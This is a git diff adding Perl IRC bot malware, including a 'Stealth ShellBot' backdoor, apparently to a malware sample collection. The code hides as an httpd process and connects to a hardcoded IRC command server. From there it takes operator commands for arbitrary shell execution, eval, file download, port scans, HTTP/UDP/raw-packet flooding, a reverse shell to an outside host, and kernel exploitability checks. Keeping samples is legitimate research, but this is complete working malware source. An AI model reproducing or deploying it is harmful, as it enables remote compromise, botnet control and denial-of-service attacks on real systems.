+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {
+  sendraw("PART $_[0]");
+}
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+
+
+sub fetch(){
+    my $rnd=(int(rand(9999)));
+    my $n= 80;
+    if ($rnd<5000) { $n<<=1;}
+    my $s= (int(rand(10)) * $n);
+{
+my @dominios = ("com","net","org","info","gov", "gob","gub","xxx","it","uk","wx", 
+
+"eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
+"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al",
+
+"dk","pl","biz","int","pro","museum","coop",
+"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba",
+
+"bw","bn","bg","bf","bi",
+"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
+    
+
+"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn",
+
+"hk","hu","in","id","ir",
+"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il",
+
+"jm","je","jo","kz","ke",
+"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md",
+
+"mc","mn","ms","mz","mm",
+"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn",
+
+"ws","as","sm","pm","vc",
+"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr",
+
+"tm","tv","ug","ua","uz",
+"vu","vn","ye","yu","cd","zm","zw","");
+my @str;
+
+foreach $dom  (@dominios)
+{
+	push (@str,"@gstring");
+}
+
+    my $query="http://buscador.terra.com.br/default.aspx?ca=s&source=Search&query=";
+    $query.=$str[(rand(scalar(@str)))];
+    $query.="&num=$n&start=$s";
+    my @lst=();
+#sendraw("privmsg #Atk33 :DEBUG only test googling: ".$query.""); 
+    my $page = http_query($query);
+    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
+if ($1 !~ m/google|cache|translate/){
+    push (@lst,$1);
+}
+    }
+    return (@lst);
+}
+
+sub http_query($){
+    my ($url) = @_;
+    my $host=$url;
+    my $query=$url;
+    my $page="";
+    $host =~ s/href=\"?http:\/\///;
+    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $query =~s/$host//;
+    if ($query eq "") {$query="/";};
+    eval {
+local $SIG{ALRM} = sub { die "1";};
+alarm 10;
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+alarm 0;
+close($sock);
+    };
+
+   return $page;
+}
+}
+
+
+# NOTE: bY destructive
+# pwnz0r!
\ No newline at end of file
diff --git a/Perl/Backdoor.Perl.Shellbot.aj b/Perl/Backdoor.Perl.Shellbot.aj
new file mode 100644
index 00000000..afe3dd04
--- /dev/null
+++ b/Perl/Backdoor.Perl.Shellbot.aj
@@ -0,0 +1,989 @@
+my $processo = "/usr/local/apache/bin/httpd -UdghdfRL"; 
+if (`ps aux` =~ /httpd -UdghdfRL/){exit;} 
+$servidor='speed.sin-ip.es' unless $servidor;
+my $porta='6667';
+my @canais=("#sni-labs");
+my @adms=("SPEED", "C4Sh", "ODLTEAM");
+
+my $linas_max=10;
+my $sleep=3;
+
+my $nick = getnick();
+my $ircname = getnick();
+my $realname = getnick();
+
+my $acessoshell = 1;
+######## Stealth ShellBot ##########
+my $estatisticas = 0;
+my $pacotes = 1;
+####################################
+
+my $VERSAO = '0.2a';
+my $version = "!sni";
+
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0";
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+my %irc_servers;
+my %DCC;
+my $dcc_sel = new IO::Select->new();
+
+#####################
+# Stealth Shellbot  #
+#####################
+
+
+
+sub getnick {
+return "Rx".int(rand(100000));
+}
+
+
+sub getident {
+  my $retornoident = &_get("http://www.minpop.com/sk12pack/idents.php");
+  my $identchance = int(rand(100));
+  if ($identchance > 30) {
+     return $nick;
+  } else {
+     return $retornoident;
+  }
+  return $retornoident;
+}
+
+sub getname {
+  my $retornoname = &_get("http://www.minpop.com/sk12pack/names.php");
+  return $retornoname;
+}
+
+# IDENT TEMPORARIA - Pegar ident da url ta bugando o_o
+sub getident2 {
+        my $length=shift;
+        $length = 3 if ($length < 3);
+
+        my @chars=('a'..'z','A'..'Z','1'..'9');
+        foreach (1..$length)
+        {
+                $randomstring.=$chars[rand @chars];
+        }
+        return $randomstring;
+}
+
+sub getstore ($$)
+{
+  my $url = shift;
+  my $file = shift;
+
+  $http_stream_out = 1;
+  open(GET_OUTFILE, "> $file");
+  %http_loop_check = ();
+  _get($url);
+  close GET_OUTFILE;
+  return $main::http_get_result;
+}
+
+sub _get
+{
+  my $url = shift;
+  my $proxy = "";
+  grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
+  if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
+    my $host = $1;
+    my $port = $2 || 80;
+    my $path = $3;
+    $path = "/" unless defined($path);
+    return _trivial_http_get($host, $port, $path);
+  } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
+    my $host = $1;
+    my $port = $2;
+    my $path = $url;
+    return _trivial_http_get($host, $port, $path);
+  } else {
+    return undef;
+  }
+}
+
+
+sub _trivial_http_get
+{
+  my($host, $port, $path) = @_;
+  my($AGENT, $VERSION, $p);
+  #print "HOST=$host, PORT=$port, PATH=$path\n";
+
+  $AGENT = "get-minimal";
+  $VERSION = "20000118";
+
+  $path =~ s/ /%20/g;
+
+  require IO::Socket;
+  local($^W) = 0;
+  my $sock = IO::Socket::INET->new(PeerAddr => $host,
+                                   PeerPort => $port,
+                                   Proto   => 'tcp',
+                                   Timeout  => 60) || return;
+  $sock->autoflush;
+  my $netloc = $host;
+  $netloc .= ":$port" if $port != 80;
+  my $request = "GET $path HTTP/1.0\015\012"
+              . "Host: $netloc\015\012"
+              . "User-Agent: $AGENT/$VERSION/u\015\012";
+  $request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
+  $request .= "\015\012";
+  print $sock $request;
+
+  my $buf = "";
+  my $n;
+  my $b1 = "";
+  while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
+    if ($b1 eq "") { # first block?
+      $b1 = $buf;         # Save this for errorcode parsing
+      $buf =~ s/.+?\015?\012\015?\012//s;      # zap header
+    }
+    if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
+  }
+  return undef unless defined($n);
+
+  $main::http_get_result = 200;
+  if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
+    $main::http_get_result = $1;
+    # print "CODE=$main::http_get_result\n$b1\n";
+    if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/
+) {
+      # redirect
+      my $url = $1;
+      return undef if $http_loop_check{$url}++;
+      return _get($url);
+    }
+    return undef unless $main::http_get_result =~ /^2/;
+  }
+
+  return $buf;
+}
+
+#############################
+#  B0tchZ na veia ehehe :P  #
+#############################
+
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 2;
+   }
+
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   &DCC::connections;
+   my @ready = $sel_cliente->can_read(0.6);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
+       }
+       elsif ($args =~ /^\001PING\s+(\d+)\001$/) {
+         notice("$pn", "\001PONG\001");
+       }
+       elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         elsif ($args =~ /^(\Q$meunick\E|\Q$version\E)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "$version" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         }
+       }
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4;
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       $meunick = getnick();
+       nick("$meunick");
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal");
+       }
+   }
+}
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=("21","22","23","25","53","80","110","143");
+             my (@aberta, %porta_banner);
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @aberta");
+             } else {
+                 sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
+             }
+           }
+           
+           elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
+            getstore("$1", "$2");
+            sendraw($IRC_cur_socket, "PRIVMSG $printl :Download de $2 ($1) Concluэdo!") if ($estatisticas);
+            }
+             
+           elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) {
+             my $hostname="$1";
+             my $portainicial = "$2";
+             my $portafinal = "$3";
+             my (@abertas, %porta_banner);
+             foreach my $porta ($portainicial..$portafinal) 
+             {
+               my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+               if ($scansock) {
+                 push (@abertas, $porta);
+                 $scansock->close;
+                 if ($estatisticas) {
+                   sendraw($IRC_cur_socket, "PRIVMSG $printl :Porta $porta aberta em $hostname");
+                 }
+               }
+             }
+             if (@abertas) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @abertas");
+             } else {
+               sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
+             }
+            }
+
+ elsif ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP-DDOS]\002 Attacking ".$1.":80 for ".$2." seconds.");
+	     my $itime = time;
+	     my ($cur_time);
+             $cur_time = time - $itime;
+	     while ($2>$cur_time){
+             $cur_time = time - $itime;
+	     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+	     close($socket);
+             }
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP-DDOS]\002 Finished with attacking ".$1.".");
+           }
+
+            # Duas Versїes simplificada do meu Tr0x ;D
+            elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
+              return unless $pacotes;
+              socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
+              my $alvo=inet_aton("$1");
+              my $porta = "$2";
+              my $tempo = "$3";
+              my $pacote;
+              my $pacotese;
+              my $fim = time + $tempo;
+              my $pacota = 1;
+              while (($pacota == "1") && ($pacotes == "1")) {
+                $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
+                $pacote=$rand x $rand x $rand;
+                $porta = int(rand 65000) +1 if ($porta == "0");
+                send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
+              }
+              if ($estatisticas)
+              {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $1");
+              }
+            }
+            
+            elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) {
+              return unless $pacotes;
+              socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
+              my $faixaip="$1";
+              my $porta = "$2";
+              my $tempo = "$3";
+              my $pacote;
+              my $pacotes;
+              my $fim = time + $tempo;
+              my $pacota = 1;
+              my $alvo;
+              while ($pacota == "1") {
+                $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
+                for (my $faixa = 1; $faixa <= 255; $faixa++) {
+                  $alvo = inet_aton("$faixaip.$faixa");
+                  $pacote=$rand x $rand x $rand;
+                  $porta = int(rand 65000) +1 if ($porta == "0");
+                  send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
+                  if ($faixa >= 255) {
+                    $faixa = 1;
+                  }
+                }
+              }
+              if ($estatisticas)
+              {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $alvo");
+              }
+            }
+            
+            # Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
+            elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
+              my $host = "$1";
+              my $porta = "$2";
+              my $proto = getprotobyname('tcp');
+              my $iaddr = inet_aton($host);
+              my $paddr = sockaddr_in($porta, $iaddr);
+              my $shell = "/bin/sh -i";
+              if ($^O eq "MSWin32") {
+                $shell = "cmd.exe";
+              }
+              socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
+              connect(SOCKET, $paddr) or die "connect: $!";
+              open(STDIN, ">&SOCKET");
+              open(STDOUT, ">&SOCKET");
+              open(STDERR, ">&SOCKET");
+              system("$shell");
+              close(STDIN);
+              close(STDOUT);
+              close(STDERR);
+
+              if ($estatisticas)
+              {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Conectando-se em\002: $host:$porta");
+              }
+            }
+
+           elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) {
+            return unless $pacotes;
+             my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+             unless ($estatisticas)
+             {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Mщdia de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
+             }
+           }
+           exit;
+       }
+  }
+}
+
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+   if ($case =~ /^join (.*)/) {
+     j("$1");
+   }
+   elsif ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   elsif ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   elsif ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+
+   elsif ($case =~ /^root/)
+   {
+	if(rooting($printl))
+	{
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Rooting]\002 Nothing rootable!!");
+	}
+    }
+   elsif ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   elsif ($case =~ /^voice/) {
+      voice("$printl", "$kem") if $case eq "voice";
+      $oarg = substr($case, 6);
+      voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   elsif ($case =~ /^devoice/) {
+      devoice("$printl", "$kem") if $case eq "devoice";
+      $oarg = substr($case, 8);
+      devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   elsif ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   elsif ($case =~ /^invite\s+(\S+) (.*)/) {
+      invite("$1", "$2");
+   }
+   elsif ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   elsif ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {
+      DCC::SEND("$1", "$2");
+   }
+   elsif ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   elsif ($case =~ /^eval (.*)/) {
+      eval "$1";
+   }
+   elsif ($case =~ /^entra\s+(\S+)\s+(\d+)/) {
+    sleep int(rand($2));
+    j("$1");
+   }
+   elsif ($case =~ /^sai\s+(\S+)\s+(\d+)/) {
+    sleep int(rand($2));
+    p("$1");
+   }
+   elsif ($case =~ /^sair/) {
+     quit();
+   }
+   elsif ($case =~ /^novonick/) {
+    my $novonick = getnick();
+     nick("$novonick");
+   }
+   elsif ($case =~ /^estatisticas (.*)/) {
+     if ($1 eq "on") {
+      $estatisticas = 1;
+      msg("$printl", "Estatэsticas ativadas!");
+     } elsif ($1 eq "off") {
+      $estatisticas = 0;
+      msg("$printl", "Estatэsticas desativadas!");
+     }
+   }
+   elsif ($case =~ /^pacotes (.*)/) {
+     if ($1 eq "on") {
+      $pacotes = 1;
+      msg("$printl", "Pacotes ativados!") if ($estatisticas == "1");
+     } elsif ($1 eq "off") {
+      $pacotes = 0;
+      msg("$printl", "Pacotes desativados!") if ($estatisticas == "1");
+     }
+   }
+}
+sub rooting {
+
+	my $printl=$_[0];
+	my $kern=`uname -a`;	
+	if ($kern =~ /2.4.17\s/ || $kern =~ /2.4.18\s/ || $kern =~ /2.4.19\s/ || $kern =~ /2.4.20/ || $kern =~ /2.4.20-8/ || $kern =~ /2.4.21\s/ || $kern =~ /2.4.22\s/ || $kern =~ /2.4.22-10\s/ || $kern =~ /2.4.23\s/ || $kern =~ /2.4.24\s/ || $kern =~ /2.4.25-1\s/ || $kern =~ /2.4.26\s/ || $kern =~ /2.4.27\s/ || $kern =~ /2.6.2\s/ || $kern =~ /2.6.5\s/ || $kern =~ /2.6.6\s/ || $kern =~ /2.6.7\s/ || $kern =~ /2.6.8\s/ || $kern =~ /2.6.8-5\s/ || $kern =~ /2.6.9\s/ || $kern =~ /2.6.9-34\s/ || $kern =~ /2.6.10\s/ || $kern =~ /2.6.11/ || $kern =~ /2.6.13\s/ || $kern =~ /2.6.13-17/ || $kern =~ /2.6.14\s/ || $kern =~ /2.6.15\s/ || $kern =~ /2.6.16\s/)
+	{
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Exploitable Kernel !!]\003\002 Im exploitable Kernel: ".`uname -r`);
+	}
+	else
+	{
+		return 1;
+	}
+return 0;
+}
+
+sub shell {
+  return unless $acessoshell;
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "Diretєrio inexistente!");
+    return;
+  }
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c >= "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
+sub attacker {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'B' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65535; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
+
+       # DoS ?? :P
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+#############
+#  ALIASES  #
+#############
+
+sub action {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}
+
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub hop {
+    return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub dehop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub voice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +v $_[1]");
+}
+sub devoice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -v $_[1]");
+}
+sub ban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +b $_[1]");
+}
+sub unban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -b $_[1]");
+}
+sub kick {
+   return unless $#_ == 1;
+   sendraw("KICK $_[0] $_[1] :$_[2]");
+}
+
+sub modo {
+   return unless $#_ == 0;
+   sendraw("MODE $_[0] $_[1]");
+}
+sub mode { modo(@_); }
+
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {sendraw("PART $_[0]");}
+
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+
+sub invite {
+   return unless $#_ == 1;
+   sendraw("INVITE $_[1] $_[0]");
+}
+sub topico {
+   return unless $#_ == 1;
+   sendraw("TOPIC $_[0] $_[1]");
+}
+sub topic { topico(@_); }
+
+sub whois {
+  return unless $#_ == 0;
+  sendraw("WHOIS $_[0]");
+}
+sub who {
+  return unless $#_ == 0;
+  sendraw("WHO $_[0]");
+}
+sub names {
+  return unless $#_ == 0;
+  sendraw("NAMES $_[0]");
+}
+sub away {
+  sendraw("AWAY $_[0]");
+}
+sub back { away(); }
+sub quit {
+  sendraw("QUIT :$_[0]");
+  exit;
+}
+
+# DCC
+package DCC;
+
+sub connections {
+   my @ready = $dcc_sel->can_read(1);
+#   return unless (@ready);
+   foreach my $fh (@ready) {
+     my $dcctipo = $DCC{$fh}{tipo};
+     my $arquivo = $DCC{$fh}{arquivo};
+     my $bytes = $DCC{$fh}{bytes};
+     my $cur_byte = $DCC{$fh}{curbyte};
+     my $nick = $DCC{$fh}{nick};
+
+     my $msg;
+     my $nread = sysread($fh, $msg, 10240);
+
